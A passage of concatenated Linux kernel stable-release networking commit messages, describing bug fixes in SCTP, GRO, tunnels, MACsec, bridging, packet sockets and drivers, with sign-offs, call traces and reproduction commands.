PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.
Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.
Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.
Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.
When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ON checksum not in linear segment. Packet sockets
always allocate at least up to csum_start + csum_off + 2 as linear.
Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c
ethtool -K eth0 tso off tx on
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N
ethtool -K eth0 tx off
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N
v2:
- add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)
Fixes: d346a3fae3 ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ae148b0858 ]
This patch updates skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit() when an
IPv6 header is installed to a socket buffer.
This is not a cosmetic change. Without updating this value, GSO packets
transmitted through an ipip6 tunnel have the protocol of ETH_P_IP and
skb_mac_gso_segment() will attempt to call gso_segment() for IPv4,
which results in the packets being dropped.
Fixes: b8921ca83e ("ip4ip6: Support for GSO/GRO")
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit bf911e985d ]
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.
The fix is to just move the check upwards so it's also validated for the
1st chunk.
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9ee7837449 ]
Daniel says:
While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:
$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80
some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.
When a user successfuly deletes a specific filter, by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.
Before this patch, the "fh" value was sent to user space as the identity.
As an example what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is infact a 32-bit truncation of 0xffff8807f3be0c80
which happens to be a 64-bit memory address of the internal filter
representation (address of the corresponding filter's struct cls_bpf_prog);
After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink rules is to be able to take an
event (such as a delete in this case) and reflect it back to the
kernel and successfully delete the filter. This patch achieves that.
Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/
[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/
Fixes: 4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d5d32e4b76 ]
Similar to IPv4, do not consider link state when validating next hops.
Currently, if the link is down default routes can fail to insert:
$ ip -6 ro add vrf blue default via 2100:2::64 dev eth2
RTNETLINK answers: No route to host
With this patch the command succeeds.
Fixes: 8c14586fc3 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e0f841f5cb ]
Even if sending SCIs is explicitly disabled, the code that creates the
Security Tag might still decide to add it (e.g. if multiple RX SCs are
defined on the MACsec interface).
But because the header length so far only depended on the configuration
option the SCI overwrote the original frame's contents (EtherType and
e.g. the beginning of the IP header) and if encrypted did not visibly
end up in the packet, while the SC flag in the TCI field of the Security
Tag was still set, resulting in invalid MACsec frames.
Fixes: c09440f7dc ("macsec: introduce IEEE 802.1AE driver")
Signed-off-by: Tobias Brunner <tobias@strongswan.org>
Acked-by: Sabrina Dubroca <sd@queasysnail.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e52fed7177 ]
The Hyper-V netvsc driver was looking at the incorrect status bits
in the checksum info. It was setting the receive checksum unnecessary
flag based on the IP header checksum being correct. The checksum
flag is skb is about TCP and UDP checksum status. Because of this
bug, any packet received with bad TCP checksum would be passed
up the stack and to the application causing data corruption.
The problem is reproducible via netcat and netem.
This had a side effect of not doing receive checksum offload
on IPv6. The driver was also also always doing checksum offload
independent of the checksum setting done via ethtool.
Signed-off-by: Stephen Hemminger <sthemmin@microsoft.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 10df8e6152 ]
First bug was added in commit ad6f939ab1 ("ip: Add offset parameter to
ip_cmsg_recv") : Tom missed that ipv4 udp messages could be received on
AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
Then commit e6afc8ace6 ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now UDP headers are pulled
before skb are put in receive queue.
Fixes: ad6f939ab1 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ecc515d723 ]
Commit 7303a14750 ("sctp: identify chunks that need to be fragmented
at IP level") made the chunk be fragmented at IP level in the next round
if it's size exceed PMTU.
But there still is another case, PMTU can be updated if transport's dst
expires and transport's pmtu_pending is set in sctp_packet_transmit. If
the new PMTU is less than the chunk, the same issue with that commit can
be triggered.
So we should drop this packet and let it retransmit in another round
where it would be fragmented at IP level.
This patch is to fix it by checking the chunk size after PMTU may be
updated and dropping this packet if it's size exceed PMTU.
Fixes: 90017accff ("sctp: Add GSO support")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@txudriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a4b8e71b05 ]
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
if (len < sizeof(int))
return -EINVAL;
On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 235bde1ed3 ]
Commit 3ac72b7b63 ("net: fec: align IP header in hardware") breaks
networking on mx28.
There is an erratum on mx28 (ENGR121613 - ENET big endian mode
not compatible with ARM little endian) that requires an additional
byte-swap operation to workaround this problem.
So call swap_buffer() prior to performing the IP header alignment
to restore network functionality on mx28.
Fixes: 3ac72b7b63 ("net: fec: align IP header in hardware")
Reported-and-tested-by: Henri Roosen <henri.roosen@ginzinger.com>
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 396a30cce1 ]
This reverts commit a681574c99
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).
Then, since we already have a lock for ping_group_range, those
using ip_local_ports.lock for ping_group_range are clearly typos.
We might consider to share a same lock for both ping_group_range
and local_port_range w.r.t. space saving, but that should be for
net-next.
Fixes: a681574c99 ("ipv4: disable BH in set_ping_group_range()")
Fixes: ba6b918ab2 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a681574c99 ]
In commit 4ee3bd4a8c ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()
Fixes: b8f1a55639 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fcd91dd449 ]
Currently, GRO can do unlimited recursion through the gro_receive
handlers. This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem. Thus, the kernel is vulnerable to a stack overflow, if we
receive a packet composed entirely of VLAN headers.
This patch adds a recursion counter to the GRO layer to prevent stack
overflow. When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally. This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.
Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.
Fixes: CVE-2016-7039
Fixes: 9b174d88c2 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 85dda4e5b0 ]
The offload flag is a status flag and should not be used by
FIB semantics for comparison.
Fixes: 37ed949369 ("rtnetlink: add RTNH_F_EXTERNAL flag for fib offload")
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Reviewed-by: Andy Gospodarek <andy@greyhouse.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 97c242902c ]
We recently got the following warning after setting up a vlan device on
top of an offloaded bridge and executing 'bridge link':
WARNING: CPU: 0 PID: 18566 at drivers/net/ethernet/mellanox/mlxsw/spectrum_switchdev.c:81 mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[...]
CPU: 0 PID: 18566 Comm: bridge Not tainted 4.8.0-rc7 #1
Hardware name: Mellanox Technologies Ltd. Mellanox switch/Mellanox switch, BIOS 4.6.5 05/21/2015
0000000000000286 00000000e64ab94f ffff880406e6f8f0 ffffffff8135eaa3
0000000000000000 0000000000000000 ffff880406e6f930 ffffffff8108c43b
0000005106e6f988 ffff8803df398840 ffff880403c60108 ffff880406e6f990
Call Trace:
[<ffffffff8135eaa3>] dump_stack+0x63/0x90
[<ffffffff8108c43b>] __warn+0xcb/0xf0
[<ffffffff8108c56d>] warn_slowpath_null+0x1d/0x20
[<ffffffffa01420d5>] mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[<ffffffffa0142195>] mlxsw_sp_port_attr_get+0xa5/0xb0 [mlxsw_spectrum]
[<ffffffff816f151f>] switchdev_port_attr_get+0x4f/0x140
[<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
[<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
[<ffffffff816f1d6b>] switchdev_port_bridge_getlink+0x5b/0xc0
[<ffffffff816f2680>] ? switchdev_port_fdb_dump+0x90/0x90
[<ffffffff815f5427>] rtnl_bridge_getlink+0xe7/0x190
[<ffffffff8161a1b2>] netlink_dump+0x122/0x290
[<ffffffff8161b0df>] __netlink_dump_start+0x15f/0x190
[<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
[<ffffffff815fab46>] rtnetlink_rcv_msg+0x1a6/0x220
[<ffffffff81208118>] ? __kmalloc_node_track_caller+0x208/0x2c0
[<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
[<ffffffff815fa9a0>] ? rtnl_newlink+0x890/0x890
[<ffffffff8161cf54>] netlink_rcv_skb+0xa4/0xc0
[<ffffffff815f56f8>] rtnetlink_rcv+0x28/0x30
[<ffffffff8161c92c>] netlink_unicast+0x18c/0x240
[<ffffffff8161ccdb>] netlink_sendmsg+0x2fb/0x3a0
[<ffffffff815c5a48>] sock_sendmsg+0x38/0x50
[<ffffffff815c6031>] SYSC_sendto+0x101/0x190
[<ffffffff815c7111>] ? __sys_recvmsg+0x51/0x90
[<ffffffff815c6b6e>] SyS_sendto+0xe/0x10
[<ffffffff817017f2>] entry_SYSCALL_64_fastpath+0x1a/0xa4
The problem is that the 8021q module propagates the call to
ndo_bridge_getlink() via switchdev ops, but the switch driver doesn't
recognize the netdev, as it's not offloaded.
While we can ignore calls being made to non-bridge ports inside the
driver, a better fix would be to push this check up to the switchdev
layer.
Note that these ndos can be called for non-bridged netdev, but this only
happens in certain PF drivers which don't call the corresponding
switchdev functions anyway.
Fixes: 99f44bb352 ("mlxsw: spectrum: Enable L3 interfaces on top of bridge devices")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Tested-by: Tamir Winetroub <tamirw@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7cb3f9214d ]
Satish reported a problem with the perm multicast router ports not getting
reenabled after some series of events, in particular if it happens that the
multicast snooping has been disabled and the port goes to disabled state
then it will be deleted from the router port list, but if it moves into
non-disabled state it will not be re-added because the mcast snooping is
still disabled, and enabling snooping later does nothing.
Here are the steps to reproduce, setup br0 with snooping enabled and eth1
added as a perm router (multicast_router = 2):
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
<empty>
At this point we have mcast enabled and eth1 as a perm router (value = 2)
but it is not in the router list which is incorrect.
After this change:
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
router ports on br0: eth1
Note: we can directly do br_multicast_enable_port for all because the
querier timer already has checks for the port state and will simply
expire if it's in blocking/disabled. See the comment added by
commit 9aa6638216 ("bridge: multicast: add a comment to
br_port_state_selection about blocking state")
Fixes: 561f1103a2 ("bridge: Add multicast_snooping sysfs toggle")
Reported-by: Satish Ashok <sashok@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9a0b1e8ba4 ]
After Jesper commit back in linux-3.18, we trigger a lockdep
splat in proc_create_data() while allocating memory from
pktgen_change_name().
This patch converts t->if_lock to a mutex, since it is now only
used from control path, and adds proper locking to pktgen_change_name()
1) pktgen_thread_lock to protect the outer loop (iterating threads)
2) t->if_lock to protect the inner loop (iterating devices)
Note that before Jesper patch, pktgen_change_name() was lacking proper
protection, but lockdep was not able to detect the problem.
Fixes: 8788370a1d ("pktgen: RCU-ify "if_list" to remove lock in next_to_run()")
Reported-by: John Sperbeck <jsperbeck@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 958b3d396d ]
In cases where the number of tx rings is not a multiple of the number of
rx rings, the tx completion event will be handled on a different core
from the transmit and population of the ring. Races on the ring will
lead to a double-free of the page, and possibly other corruption.
The rings are initialized by default with a valid multiple of rings,
based on the number of cpus, therefore an invalid configuration requires
ethtool to change the ring layout. For instance 'ethtool -L eth0 rx 9 tx
8' will cause packets received on rx0, and XDP_TX'd to tx48, to be
completed on cpu3 (48 % 9 == 3).
Resolve this discrepancy by shifting the irq for the xdp tx queues to
start again from 0, modulo rx_ring_num.
Fixes: 9ecc2d8617 ("net/mlx4_en: add xdp forwarding and data write support")
Reported-by: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: Brenden Blanco <bblanco@plumgrid.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fc791b6335 ]
After the commit 9207f9d45b ("net: preserve IP control block
during GSO segmentation"), the GSO CB and the IPoIB CB conflict.
That destroy the IPoIB address information cached there,
causing a severe performance regression, as better described here:
http://marc.info/?l=linux-kernel&m=146787279825501&w=2
This change moves the data cached by the IPoIB driver from the
skb control lock into the IPoIB hard header, as done before
the commit 936d7de3d7 ("IPoIB: Stop lying about hard_header_len
and use skb->cb to stash LL addresses").
In order to avoid GRO issue, on packet reception, the IPoIB driver
stash into the skb a dummy pseudo header, so that the received
packets have actually a hard header matching the declared length.
To avoid changing the connected mode maximum mtu, the allocated
head buffer size is increased by the pseudo header length.
After this commit, IPoIB performances are back to pre-regression
value.
v2 -> v3: rebased
v1 -> v2: avoid changing the max mtu, increasing the head buf size
Fixes: 9207f9d45b ("net: preserve IP control block during GSO segmentation")
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a220445f9f ]
The goal of the patch is to fix this scenario:
ip link add dummy1 type dummy
ip link set dummy1 up
ip link set lo down ; ip link set lo up
After that sequence, the local route to the link layer address of dummy1 is
not there anymore.
When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.
In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still sets to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.
Fixes: 25fb6ca4ed ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f62 ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b1 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 68d00f332e ]
The commit ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel
endpoints.") introduces support for wildcards in tunnels endpoints,
but in some rare circumstances ip6_tnl_lookup selects wrong tunnel
interface relying only on source or destination address of the packet
and not checking presence of wildcard in tunnels endpoints. Later in
ip6_tnl_rcv this packets can be dicarded because of difference in
ipproto even if fallback device have proper ipproto configuration.
This patch adds checks of wildcard endpoint in tunnel avoiding such
behavior
Fixes: ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel endpoints.")
Signed-off-by: Vadim Fedorenko <junk@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3c293f4e08 ]
The phy_start() is used to indicate the PHY is now ready to do its
work. The state is changed, normally to PHY_UP which means that both
the MAC and the PHY are ready.
If the phy driver is using polling, when the next poll happens, the
state machine notices the PHY is now in PHY_UP, and kicks off
auto-negotiation, if needed.
If however, the PHY is using interrupts, there is no polling. The phy
is stuck in PHY_UP until the next interrupt comes along. And there is
no reason for the PHY to interrupt.
Have phy_start() schedule the state machine to run, which both speeds
up the polling use case, and makes the interrupt use case actually
work.
This problems exists whenever there is a state change which will not
cause an interrupt. Trigger the state machine in these cases,
e.g. phy_error().
Signed-off-by: Andrew Lunn <andrew@lunn.ch>
Cc: Kyle Roeschley <kyle.roeschley@ni.com>
Tested-by: Kyle Roeschley <kyle.roeschley@ni.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ab102b80ce ]
Krister reported a kernel NULL pointer dereference after
tcf_action_init_1() invokes a_o->init(), it is a race condition
where one thread calling tcf_register_action() to initialize
the netns data after putting act ops in the global list and
the other thread searching the list and then calling
a_o->init(net, ...).
Fix this by moving the pernet ops registration before making
the action ops visible. This is fine because: a) we don't
rely on act_base in pernet ops->init(), b) in the worst case we
have a fully initialized netns but ops is still not ready so
new actions still can't be created.
Reported-by: Krister Johansen <kjlx@templeofstupid.com>
Tested-by: Krister Johansen <kjlx@templeofstupid.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 02a9079c66 ]
The reserved field precise_offset->rsv is not cleared before being
copied to user space, leaking kernel stack memory. Clear the struct
before it's copied.
Signed-off-by: Vlad Tsyrklevich <vlad@tsyrklevich.net>
Acked-by: Richard Cochran <richardcochran@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d35c99ff77 ]
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.
Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.
The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.
On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT
While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.
iproute2 already uses 32KB recvmsg() buffer sizes.
Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)
Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6664498280 ]
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.
This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 93409033ae ]
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.
The following sequence of commands will reproduce the issue:
ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr
This creates an upper/lower tree of (excuse the poor ASCII art):
/---eth0.100-eth0
mac0-testbr-
\---eth0.200-eth0
When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.
This change adds reference count propagation so things are handled properly.
Matthias Schiffer reported a similar crash in batman-adv:
https://github.com/freifunk-gluon/gluon/issues/680https://www.open-mesh.org/issues/247
which this patch also seems to resolve.
Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit f39acc84aa ]
Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
case where the input skb data pointer does not point at the mac header:
- They're doing push/pop, but fail to properly unwind data back to its
original location.
For example, in the skb_vlan_push case, any subsequent
'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
BEFORE start of frame, leading to bogus frames that may be transmitted.
- They update rcsum per the added/removed 4 bytes tag.
Alas if data is originally after the vlan/eth headers, then these
bytes were already pulled out of the csum.
OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
present no issues.
act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
at network header (upon ingress).
Other calles (ovs, bpf) already adjust skb->data at mac_header.
This patch fixes act_vlan to point to the mac_header prior calling
skb_vlan_*() functions, as other callers do.
